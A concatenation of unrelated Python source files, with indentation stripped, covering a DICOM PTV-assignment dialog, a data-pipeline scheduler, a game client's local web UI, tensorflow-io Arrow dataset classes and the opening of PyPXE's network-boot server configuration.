self.label["patient_name"].GetLabel()[:right_colon_index]
+ pat_label_end
)
self.label["patient_name"].SetLabel(new_pat_label)
def update_data(self, increment=0):
self.current_index += increment
progress = 100 * float(self.current_index) / (len(self.allowed_indices) - 1)
self.gauge.SetValue(progress)
self.update_back_next_buttons()
if self.current_index < len(self.allowed_indices):
i = self.allowed_indices[self.current_index]
self.plan_uid, self.study_uid = self.uids[i]
data = self.parsed_dicom_data[self.plan_uid]
for key, text_ctrl in self.text_ctrl.items():
value = (
getattr(data, key) if key != "plan_uid" else self.plan_uid
)
if key == "sim_study_date":
try:
date = parse_date(value)
value = "%s-%s-%s" % (date.year, date.month, date.day)
except Exception:
pass
text_ctrl.SetValue(value)
self.update_ptv_data_tables()
self.update_labels()
else:
self.close()
def update_ptv_data_tables(self):
ptvs = self.get_current_ptv_assignments()
for key in ["ignored", "included"]:
column = key.capitalize()
self.data_table[key].set_data({column: ptvs[key]}, [column])
def get_current_ptv_assignments(self):
included, ignored = [], []
for ptv in self.ptvs[self.study_uid]:
if ptv in self.ptvs[self.plan_uid]:
included.append(ptv)
else:
ignored.append(ptv)
included.sort()
ignored.sort()
return {"included": included, "ignored": ignored}
def on_next(self, *evt):
self.update_data(1)
def on_back(self, *evt):
self.update_data(-1)
def on_include(self, *evt):
selected_ptvs = set(
[row[0] for row in self.data_table["ignored"].selected_row_data]
)
self.ptvs[self.plan_uid] = self.ptvs[self.plan_uid].union(
selected_ptvs
)
self.update_data()
def on_ignore(self, *evt):
selected_ptvs = set(
[row[0] for row in self.data_table["included"].selected_row_data]
)
self.ptvs[self.plan_uid] = self.ptvs[self.plan_uid].difference(
selected_ptvs
)
self.update_data()
def close(self):
for plan_uid, parsed_dicom_data in self.parsed_dicom_data.items():
if plan_uid in self.ptvs.values():
parsed_dicom_data.plan_ptvs = list(self.ptvs[plan_uid])
self.continue_status = True
self.Close()
def update_back_next_buttons(self):
self.button_back.Enable(self.current_index > 0)
label = "Next" if self.current_index < len(self.uids) - 1 else "Finish"
self.button_next.SetLabel(label)
def __set_auto_assigned(self):
# Auto skip if < 2 PTVs
self.auto_assigned = []
self.allowed_indices = []
for i, (plan_uid, study_uid) in enumerate(self.uids):
ptv_count = len(self.ptvs[study_uid])
if ptv_count < 2:
if ptv_count == 1:
self.ptvs[plan_uid] = self.ptvs[self.study_uid]
self.auto_assigned.append(i)
else:
self.allowed_indices.append(i)
class PreprocessDicom:
def __init__(self, parent):
self.parent = parent
self.directory = None
self.__do_subscribe()
self.run_warning() # will call self.run()
def __do_subscribe(self):
pub.subscribe(
self.build_dicom_file_tree_prompt, "build_dicom_file_tree_prompt"
)
def __do_unsubscribe(self):
pub.unsubAll(topicName="build_dicom_file_tree_prompt")
def run_warning(self):
caption = "WARNING\nThis will edit the StudyInstanceUID of DICOM files selected in the next window!"
message = "This shouldn't be needed for DICOM compliant files, use with caution.\n\nAre you sure?"
MessageDialog(self.parent, caption, message, action_yes_func=self.run)
def run(self):
dlg = wx.DirDialog(
self.parent,
"Select a directory",
"",
wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST,
)
if dlg.ShowModal() == wx.ID_OK:
self.directory = dlg.GetPath()
_, obj_list = get_new_uids_by_directory(self.directory)
ProgressFrame(
obj_list,
edit_study_uid,
title="Writing New StudyInstanceUIDs",
action_msg="Processing File",
close_msg="build_dicom_file_tree_prompt",
kwargs=True,
)
dlg.Destroy()
def build_dicom_file_tree(self):
if self.directory is not None:
pub.sendMessage("build_dicom_file_tree", directory=self.directory)
def build_dicom_file_tree_prompt(self):
caption = "Parse this directory for import?"
MessageDialog(
self.parent, caption, action_yes_func=self.build_dicom_file_tree
)
self.__do_unsubscribe()
|
scheduler.py | import logging
import multiprocessing as mp
import pandas as pd
from uuid import UUID
import emission.core.get_database as edb
import emission.net.usercache.abstract_usercache as enua
import emission.storage.timeseries.aggregate_timeseries as estag
import emission.storage.decorations.user_queries as esdu
import emission.pipeline.intake_stage as epi
def get_split_uuid_lists(n_splits, is_public_pipeline):
get_count = lambda u: enua.UserCache.getUserCache(u).getMessageCount()
"""
This is the count of messages in the usercache. While we can use it for the
scheduling, it is just a hint, because having a zero count here is no guarantee
of zero count in the processing. And in particular, having a zero count here is
no indication that there are no pending entries in the long-term cache. I think
that's why we used to have the long-term cache and the user cache uuid list separately.
That technique is no longer feasible because it requires coordination after the
usercache is processed instead of parallelizing the entire pipeline.
In general, this should be a pretty good hint, but I am not sure that it is perfect,
and I am not ready to try this out weeks before the big deployment, with one day's
testing. I also don't want to use UserCache.getMessage() since it returns the entire
list instead of just the count. So we use the count as a hint and don't filter out
users based on that.
"""
if is_public_pipeline:
sel_uuids = esdu.get_test_phone_uuids()
else:
sel_uuids = esdu.get_non_test_phone_uuids()
sel_jobs = [(u, get_count(u)) for u in sel_uuids]
# non_zero_jobs = [j for j in sel_jobs if j[1] !=0 ]
# Not filtering for now
non_zero_jobs = sel_jobs
logging.debug("sel_uuids = %s, sel_jobs = %s, non_zero_jobs = %s" %
(len(sel_uuids), len(sel_jobs), len(non_zero_jobs)))
non_zero_jobs_df = pd.DataFrame(non_zero_jobs, columns=['user_id', 'count']).sort("count")
ret_splits = []
for i in range(0, n_splits):
ret_splits.append([])
col = 0
for i, nzj in enumerate(non_zero_jobs_df.to_dict('records')):
ret_splits[col].append(nzj['user_id'])
col = col + 1
if col == n_splits:
logging.debug("reached n_splits, setting to zero")
col = 0
logging.debug("Split values are %s" % ret_splits)
return ret_splits
def dispatch(split_lists, is_public_pipeline):
process_list = []
for i, uuid_list in enumerate(split_lists):
logging.debug("Dispatching list %s" % uuid_list)
pid = "public_%s" % i if is_public_pipeline else i
p = mp.Process(target=epi.run_intake_pipeline, args=(pid, uuid_list))
logging.info("Created process %s to process %s list of size %s" %
(p, i, len(uuid_list)))
p.start()
process_list.append(p)
|
WebUI.py | import http.server
import logging
import os
import socket
import socketserver
import threading
import webbrowser
import asyncio
from functools import partial
from NetUtils import Node
from MultiClient import Context
import Utils
logger = logging.getLogger("WebUIRelay")
class WebUiClient(Node):
def __init__(self):
super().__init__()
self.manual_snes = None
@staticmethod
def build_message(msg_type: str, content: dict) -> dict:
return {'type': msg_type, 'content': content}
def log_info(self, message, *args, **kwargs):
self.broadcast_all(self.build_message('info', message))
logger.info(message, *args, **kwargs)
def log_warning(self, message, *args, **kwargs):
self.broadcast_all(self.build_message('warning', message))
logger.warning(message, *args, **kwargs)
def log_error(self, message, *args, **kwargs):
self.broadcast_all(self.build_message('error', message))
logger.error(message, *args, **kwargs)
def log_critical(self, message, *args, **kwargs):
self.broadcast_all(self.build_message('critical', message))
logger.critical(message, *args, **kwargs)
def send_chat_message(self, message):
self.broadcast_all(self.build_message('chat', message))
def send_connection_status(self, ctx: Context):
asyncio.create_task(self._send_connection_status(ctx))
async def _send_connection_status(self, ctx: Context):
cache = Utils.persistent_load()
cached_address = cache.get("servers", {}).get("default", None)
server_address = ctx.server_address if ctx.server_address else cached_address if cached_address else None
self.broadcast_all(self.build_message('connections', {
'snesDevice': ctx.snes_attached_device[1] if ctx.snes_attached_device else None,
'snes': ctx.snes_state,
'serverAddress': server_address,
'server': 1 if ctx.server is not None and not ctx.server.socket.closed else 0,
}))
def send_device_list(self, devices):
self.broadcast_all(self.build_message('availableDevices', {
'devices': devices,
}))
def poll_for_server_ip(self):
self.broadcast_all(self.build_message('serverAddress', {}))
def notify_item_sent(self, finder, recipient, item, location, i_am_finder: bool, i_am_recipient: bool):
self.broadcast_all(self.build_message('itemSent', {
'finder': finder,
'recipient': recipient,
'item': item,
'location': location,
'iAmFinder': 1 if i_am_finder else 0,
'iAmRecipient': 1 if i_am_recipient else 0,
}))
def notify_item_found(self, finder: str, item: str, location: str, i_am_finder: bool):
self.broadcast_all(self.build_message('itemFound', {
'finder': finder,
'item': item,
'location': location,
'iAmFinder': 1 if i_am_finder else 0,
}))
def notify_item_received(self, finder: str, item: str, location: str, item_index: int, queue_length: int):
self.broadcast_all(self.build_message('itemReceived', {
'finder': finder,
'item': item,
'location': location,
'itemIndex': item_index,
'queueLength': queue_length,
}))
def send_hint(self, finder, recipient, item, location, found, i_am_finder: bool, i_am_recipient: bool,
entrance_location: str = None):
self.broadcast_all(self.build_message('hint', {
'finder': finder,
'recipient': recipient,
'item': item,
'location': location,
'found': int(found),
'iAmFinder': int(i_am_finder),
'iAmRecipient': int(i_am_recipient),
'entranceLocation': entrance_location,
}))
def send_game_info(self, ctx: Context):
self.broadcast_all(self.build_message('gameInfo', {
'clientVersion': Utils.__version__,
'hintCost': ctx.hint_cost,
'checkPoints': ctx.check_points,
'forfeitMode': ctx.forfeit_mode,
'remainingMode': ctx.remaining_mode,
}))
def send_location_check(self, ctx: Context, last_check: str):
self.broadcast_all(self.build_message('locationCheck', {
'totalChecks': len(ctx.locations_checked),
'hintPoints': ctx.hint_points,
'lastCheck': last_check,
}))
class WaitingForUiException(Exception):
pass
web_thread = None
PORT = 5050
class RequestHandler(http.server.SimpleHTTPRequestHandler):
def log_request(self, code='-', size='-'):
pass
def log_message(self, format, *args):
pass
def log_date_time_string(self):
pass
Handler = partial(RequestHandler,
directory=Utils.local_path("data", "web", "public"))
def start_server(socket_port: int, on_start=lambda: None):
global web_thread
try:
server = socketserver.TCPServer(("", PORT), Handler)
except OSError:
# In most cases "Only one usage of each socket address (protocol/network address/port) is normally permitted"
import logging
# If the exception is caused by our desired port being unavailable, assume the web server is already running
# from another client instance
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
if sock.connect_ex(('localhost', PORT)) == 0:
logging.info("Web server is already running in another client window.")
webbrowser.open(f'http://localhost:{PORT}?port={socket_port}')
return
# If the exception is caused by something else, report on it
logging.exception("Unable to bind port for local web server. The CLI client should work in all cases.")
else:
print("serving at port", PORT)
on_start()
web_thread = threading.Thread(target=server.serve_forever).start()
|
arrow_dataset_ops.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arrow Dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import io
from itertools import chain
import os
import socket
import threading
import tempfile
import tensorflow as tf
from tensorflow import dtypes
from tensorflow.compat.v2 import data
from tensorflow.python.data.ops.dataset_ops import flat_structure
from tensorflow.python.data.util import structure as structure_lib
from tensorflow_io import _load_library
arrow_ops = _load_library('_arrow_ops.so')
if hasattr(tf, "nest"):
from tensorflow import nest # pylint: disable=ungrouped-imports
else:
from tensorflow.python.data.util import nest # pylint: disable=ungrouped-imports
def arrow_to_tensor_type(pa_t):
"""Convert Arrow type to tuple of (Tensor dtype, shape dims).
This function requires pyarrow to be installed.
"""
import pyarrow as pa
shape_dims = [] # initialize shape as scalar
if pa.types.is_boolean(pa_t):
tf_t = dtypes.bool
elif pa.types.is_int8(pa_t):
tf_t = dtypes.int8
elif pa.types.is_int16(pa_t):
tf_t = dtypes.int16
elif pa.types.is_int32(pa_t):
tf_t = dtypes.int32
elif pa.types.is_int64(pa_t):
tf_t = dtypes.int64
elif pa.types.is_uint8(pa_t):
tf_t = dtypes.uint8
elif pa.types.is_uint16(pa_t):
tf_t = dtypes.uint16
elif pa.types.is_uint32(pa_t):
tf_t = dtypes.uint32
elif pa.types.is_uint64(pa_t):
tf_t = dtypes.uint64
elif pa.types.is_float16(pa_t):
tf_t = dtypes.float16
elif pa.types.is_float32(pa_t):
tf_t = dtypes.float32
elif pa.types.is_float64(pa_t):
tf_t = dtypes.float64
elif pa.types.is_list(pa_t):
if pa.types.is_list(pa_t.value_type):
raise TypeError("Nested arrays are not currently supported: " + str(pa_t))
tf_t, shape_dims = arrow_to_tensor_type(pa_t.value_type)
shape_dims.append(None) # pyarrow scalar arrays can be variable length
else:
raise TypeError("Unsupported type in conversion from Arrow: " + str(pa_t))
return tf_t, shape_dims
def arrow_schema_to_tensor_types(schema):
"""Convert an Arrow schema to tuple of (Tensor dtypes, TensorShapes).
This function requires pyarrow to be installed.
"""
type_shape_list = [arrow_to_tensor_type(field.type) for field in schema]
tensor_types, shape_dims = zip(*type_shape_list)
tensor_shapes = tuple(tf.TensorShape(s) for s in shape_dims)
return tensor_types, tensor_shapes
class ArrowBaseDataset(data.Dataset):
"""Base class for Arrow Datasets to provide columns used in record batches
and corresponding output tensor types, shapes and classes.
"""
batch_modes_supported = ('keep_remainder', 'drop_remainder', 'auto')
def __init__(self,
make_variant_fn,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode='keep_remainder'):
self._columns = columns
self._structure = structure_lib.convert_legacy_structure(
output_types,
output_shapes or nest.map_structure(
lambda _: tf.TensorShape(None), output_types),
nest.map_structure(lambda _: tf.Tensor, output_types))
self._batch_size = tf.convert_to_tensor(
batch_size or 0,
dtype=dtypes.int64,
name="batch_size")
if batch_mode not in self.batch_modes_supported:
raise ValueError(
"Unsupported batch_mode: '{}', must be one of {}"
.format(batch_mode, self.batch_modes_supported))
self._batch_mode = tf.convert_to_tensor(
batch_mode,
dtypes.string,
name="batch_mode")
if batch_size is not None or batch_mode == 'auto':
# pylint: disable=protected-access
self._structure = self._structure._batch(
batch_size if batch_mode == 'drop_remainder' else None)
variant_tensor = make_variant_fn(
columns=self._columns,
batch_size=self._batch_size,
batch_mode=self._batch_mode,
**flat_structure(self))
super(ArrowBaseDataset, self).__init__(variant_tensor)
def _inputs(self):
return []
@property
def _element_structure(self):
return self._structure
@property
def columns(self):
return self._columns
@property
def batch_size(self):
return self._batch_size
@property
def batch_mode(self):
return self._batch_mode
class ArrowDataset(ArrowBaseDataset):
"""An Arrow Dataset from record batches in memory, or a Pandas DataFrame.
"""
def __init__(self,
serialized_batches,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an ArrowDataset from a Tensor of serialized batches.
This constructor requires pyarrow to be installed.
Args:
serialized_batches: A string Tensor as a serialized buffer containing
Arrow record batches as Arrow file format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched Tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
super(ArrowDataset, self).__init__(
partial(arrow_ops.arrow_dataset, serialized_batches),
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
@classmethod
def from_record_batches(cls,
record_batches,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an ArrowDataset directly from Arrow record batches.
This constructor requires pyarrow to be installed.
Args:
record_batches: An Arrow record batch or sequence of record batches
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
import pyarrow as pa
if isinstance(record_batches, pa.RecordBatch):
record_batches = [record_batches]
if columns is None:
columns = tuple(range(record_batches[0].num_columns))
assert record_batches
buf = io.BytesIO()
writer = pa.RecordBatchFileWriter(buf, record_batches[0].schema)
for batch in record_batches:
writer.write_batch(batch)
writer.close()
serialized_batches = tf.convert_to_tensor(
buf.getvalue(),
dtype=dtypes.string,
name="serialized_batches")
return cls(
serialized_batches,
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
@classmethod
def from_pandas(cls,
df,
columns=None,
preserve_index=True,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an ArrowDataset from a given Pandas DataFrame. Output types
and shapes are inferred from the Arrow schema after DataFrame conversion.
If preserve_index is True, the DataFrame index will be the last column.
This method requires pyarrow to be installed.
Args:
df: a Pandas DataFrame
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
import pyarrow as pa
if columns is not None:
df = df.iloc[:, list(columns)]
batch = pa.RecordBatch.from_pandas(df, preserve_index=preserve_index)
columns = tuple(range(batch.num_columns))
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
batch,
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
class ArrowFeatherDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from Arrow feather files.
Feather is a light-weight columnar format ideal for simple writing of
Pandas DataFrames. Pyarrow can be used for reading/writing Feather files,
see https://arrow.apache.org/docs/python/ipc.html#feather-format
"""
def __init__(self,
filenames,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an ArrowDataset from one or more Feather file names.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
filenames = tf.convert_to_tensor(
filenames,
dtype=dtypes.string,
name="filenames")
super(ArrowFeatherDataset, self).__init__(
partial(arrow_ops.arrow_feather_dataset, filenames),
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
@classmethod
def from_schema(cls,
filenames,
schema,
columns=None,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an Arrow Dataset for reading record batches from Arrow feather
files, inferring output types and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
filenames: A `tf.string` tensor, Python list or scalar containing files
in Arrow Feather format
schema: Arrow schema defining the record batch data in the stream
columns: A list of column indicies to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
filenames,
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
class ArrowStreamDataset(ArrowBaseDataset):
"""An Arrow Dataset for reading record batches from an input stream.
Currently supported input streams are a socket client or stdin.
"""
def __init__(self,
endpoints,
columns,
output_types,
output_shapes=None,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an ArrowDataset from an input stream.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` could have the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
columns: A list of column indices to be used in the Dataset
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
endpoints = tf.convert_to_tensor(
endpoints,
dtype=dtypes.string,
name="endpoints")
super(ArrowStreamDataset, self).__init__(
partial(arrow_ops.arrow_stream_dataset, endpoints),
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
@classmethod
def from_schema(cls,
endpoints,
schema,
columns=None,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an Arrow Dataset from an input stream, inferring output types
and shapes from the given Arrow schema.
This method requires pyarrow to be installed.
Args:
endpoints: A `tf.string` tensor, Python list or scalar string defining the
input stream.
`endpoints` could have the following formats:
- "host:port": IPv4 address (default)
- "tcp://<host:port>": IPv4 address,
- "unix://<path>": local path as unix socket address,
- "fd://<number>": STDIN or file descriptor number. For
STDIN, use "fd://0" or "fd://-".
schema: Arrow schema defining the record batch data in the stream
columns: A list of column indicies to use from the schema, None for all
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
if columns is None:
columns = list(range(len(schema)))
output_types, output_shapes = arrow_schema_to_tensor_types(schema)
return cls(
endpoints,
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
@classmethod
def from_record_batches(cls,
record_batch_iter,
output_types,
output_shapes=None,
columns=None,
batch_size=None,
batch_mode='keep_remainder'):
"""Create an ArrowStreamDataset by serving a sequence of Arrow record
batches in a background thread.
This constructor requires pyarrow to be installed.
Args:
record_batch_iter: A sequence or iterator of Arrow record batches
output_types: Tensor dtypes of the output tensors
output_shapes: TensorShapes of the output tensors or None to
infer partial
columns: Optional list of column indices to be used, if None all are used
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: batch_size does not need to be set if batch_mode='auto'
batch_mode: Mode of batching, supported strings:
"keep_remainder" (default, keeps partial batch data),
"drop_remainder" (discard partial batch data),
"auto" (size to number of records in Arrow record batch)
"""
import pyarrow as pa
# Create a UDS server by default if not Windows
if os.name != "nt":
sock_path = os.path.join(tempfile.gettempdir(), 'arrow_io_stream.sock')
endpoint = 'unix://{}'.format(sock_path)
try:
os.unlink(sock_path)
except OSError:
if os.path.exists(sock_path):
raise
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.bind(sock_path)
# Create a TCP server
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('127.0.0.1', 0))
host_addr, port = sock.getsockname()
endpoint = '{}:{}'.format(host_addr, port)
sock.listen(1)
def run_server():
"""serve record batches"""
conn, _ = sock.accept()
outfile = conn.makefile(mode='wb')
writer = None
for batch in record_batch_iter:
if writer is None:
writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
writer.write_batch(batch)
writer.close()
outfile.close()
conn.close()
sock.close()
# Run the server in a thread
server = threading.Thread(target=run_server)
server.daemon = True
server.start()
if columns is None:
columns = list(range(len(output_types)))
return cls(
endpoint,
columns,
output_types,
output_shapes,
batch_size,
batch_mode)
@classmethod
def from_pandas(cls,
data_frames,
columns=None,
preserve_index=True,
batch_size=None):
"""Create an ArrowStreamDataset by serving a DataFrame, or batches of a
DataFrame in a background thread.
This constructor requires pandas and pyarrow to be installed.
Args:
df: A Pandas DataFrame or sequence of DataFrames
columns: Optional column indices to use, if None all are used
preserve_index: Flag to include the DataFrame index as the last column
batch_size: Batch size of output tensors, setting a batch size here
will create batched tensors from Arrow memory and can be more
efficient than using tf.data.Dataset.batch().
NOTE: Currently, only 'keep_remainder' batch mode supported
"""
import pandas as pd
import pyarrow as pa
if isinstance(data_frames, pd.DataFrame):
data_frames = [data_frames]
def gen_record_batches():
"""record batch generator"""
for df in data_frames:
if columns is not None:
df = df.iloc[:, list(columns)]
# If batching, slice DataFrame and convert to record batches
if batch_size is not None:
# Pandas will produce a partial batch if there is a remainder
for i in range(0, len(df), batch_size):
df_slice = df[i:i + batch_size]
batch = pa.RecordBatch.from_pandas(
df_slice, preserve_index=preserve_index)
yield batch
# Not batching, convert entire DataFrame to one record batch
else:
batch = pa.RecordBatch.from_pandas(
df, preserve_index=preserve_index)
yield batch
# Get first batch to convert schema to output types and shapes
record_batch_iter = gen_record_batches()
batch = next(record_batch_iter)
output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
return cls.from_record_batches(
chain([batch], record_batch_iter),
output_types,
output_shapes,
batch_size=batch_size,
batch_mode='keep_remainder')
|
server.py | #!/usr/bin/env python
import threading
import io
import os
import sys
import json
import logging
import logging.handlers
try:
import argparse
except ImportError:
sys.exit("ImportError: You do not have the Python 'argparse' module installed. Please install the 'argparse' module and try again.")
from time import sleep
from pypxe import tftp # PyPXE TFTP service
from pypxe import dhcp # PyPXE DHCP service
from pypxe import http # PyPXE HTTP service
from pypxe import nbd # PyPXE NBD service
from pypxe import helpers
args = None
# default settings
SETTINGS = {'NETBOOT_DIR':'netboot',
'NETBOOT_FILE':'',
'DHCP_SERVER_IP':'192.168.2.2',
'DHCP_SERVER_PORT':67,
'DHCP_OFFER_BEGIN':'192.168.2.100',
'DHCP_OFFER_END':'192.168.2.150',
'DHCP_SUBNET':'255.255.255.0',
'DHCP_DNS':'8.8.8.8',
'DHCP_ROUTER':'192.168.2.1',
'DHCP_BROADCAST':'',
'DHCP_FILESERVER':'192.168.2.2',
'DHCP_WHITELIST':False,
'HTTP_PORT':80,
'HTTP_SERVER_IP':'0.0.0.0',
'LEASES_FILE':'',
'STATIC_CONFIG':'',
'SYSLOG_SERVER':None,
'SYSLOG_PORT':514,
'TFTP_SERVER_IP':'0.0.0.0',
'USE_IPXE':False,
'USE_HTTP':False,
'USE_TFTP':True,
'USE_DHCP':False,
'DHCP_MODE_PROXY':False,
'NBD_BLOCK_DEVICE':'',
'NBD_WRITE':False,
'NBD_COW':True,
'NBD_COW_IN_MEM':False,
'NBD_COPY_TO_RAM':False,
'NBD_SERVER_IP':'0.0.0.0',
'NBD_PORT':10809,
'MODE_DEBUG':'',
'MODE_VERBOSE':''}
def parse_cli_arguments():
# main service arguments
parser = argparse.ArgumentParser(description = 'Set options at runtime. Defaults are in %(prog)s', formatter_class = argparse.ArgumentDefaultsHelpFormatter)
ipxeexclusive = parser.add_mutually_exclusive_group(required = False)
ipxeexclusive.add_argument('--ipxe', action = 'store_true', dest = 'USE_IPXE', help = 'Enable iPXE ROM', default = SETTINGS['USE_IPXE'])
ipxeexclusive.add_argument('--no-ipxe', action = 'store_false', dest = 'USE_IPXE', help = 'Disable iPXE ROM', default = not SETTINGS['USE_IPXE'])
httpexclusive = parser.add_mutually_exclusive_group(required = False)
httpexclusive.add_argument('--http', action = 'store_true', dest = 'USE_HTTP', help = 'Enable built-in HTTP server', default = SETTINGS['USE_HTTP'])
httpexclusive.add_argument('--no-http', action = 'store_false', dest = 'USE_HTTP', help = 'Disable built-in HTTP server', default = not SETTINGS['USE_HTTP'])
tftpexclusive = parser.add_mutually_exclusive_group(required = False)
tftpexclusive.add_argument('--tftp', action = 'store_true', dest = 'USE_TFTP', help = 'Enable built-in TFTP server, by default it is enabled', default = SETTINGS['USE_TFTP'])
tftpexclusive.add_argument('--no-tftp', action = 'store_false', dest = 'USE_TFTP', help = 'Disable built-in TFTP server, by default it is enabled', default = not SETTINGS['USE_TFTP'])
parser.add_argument('--debug', action = 'store', dest = 'MODE_DEBUG', help = 'Comma Seperated (http,tftp,dhcp). Adds verbosity to the selected services while they run. Use \'all\' for enabling debug on all services. Precede an option with \'-\' to disable debugging for that service; as an example, one can pass in the following to enable debugging for all services except the DHCP service: \'--debug all,-dhcp\'', default = SETTINGS['MODE_DEBUG'])
parser.add_argument('--verbose', action = 'store', dest = 'MODE_VERBOSE', help = 'Comma Seperated (http,tftp,dhcp). Adds verbosity to the selected services while they run. Less verbose than \'debug\'. Use \'all\' for enabling verbosity on all services. Precede an option with \'-\' to disable debugging for that service; as an example, one can pass in the following to enable debugging for all services except the DHCP service: \'--debug all,-dhcp\'', default = SETTINGS['MODE_VERBOSE'])
parser.add_argument('--config', action = 'store', dest = 'JSON_CONFIG', help = 'Configure from a JSON file rather than the command line', default = '')
parser.add_argument('--dump-config', action = 'store_true', dest = 'DUMP_CONFIG', help = 'Dump the default configuration as a valid input file')
parser.add_argument('--dump-config-merged', action = 'store_true', dest = 'DUMP_CONFIG_MERGED', help = 'Like --dump-config, but also merge in CLI options')
parser.add_argument('--static-config', action = 'store', dest = 'STATIC_CONFIG', help = 'Configure leases from a json file rather than the command line', default = SETTINGS['STATIC_CONFIG'])
parser.add_argument('--save-leases', action = 'store', dest = 'LEASES_FILE', help = 'Save all DHCP leases on exit or SIGHUP. Will load from this file on start', default = SETTINGS['LEASES_FILE'])
parser.add_argument('--syslog', action = 'store', dest = 'SYSLOG_SERVER', help = 'Syslog server', default = SETTINGS['SYSLOG_SERVER'])
parser.add_argument('--syslog-port', action = 'store', dest = 'SYSLOG_PORT', help = 'Syslog server port', default = SETTINGS['SYSLOG_PORT'])
# DHCP server arguments
dhcp_group = parser.add_argument_group(title = 'DHCP', description = 'Arguments relevant to the DHCP server')
exclusive = dhcp_group.add_mutually_exclusive_group(required = False)
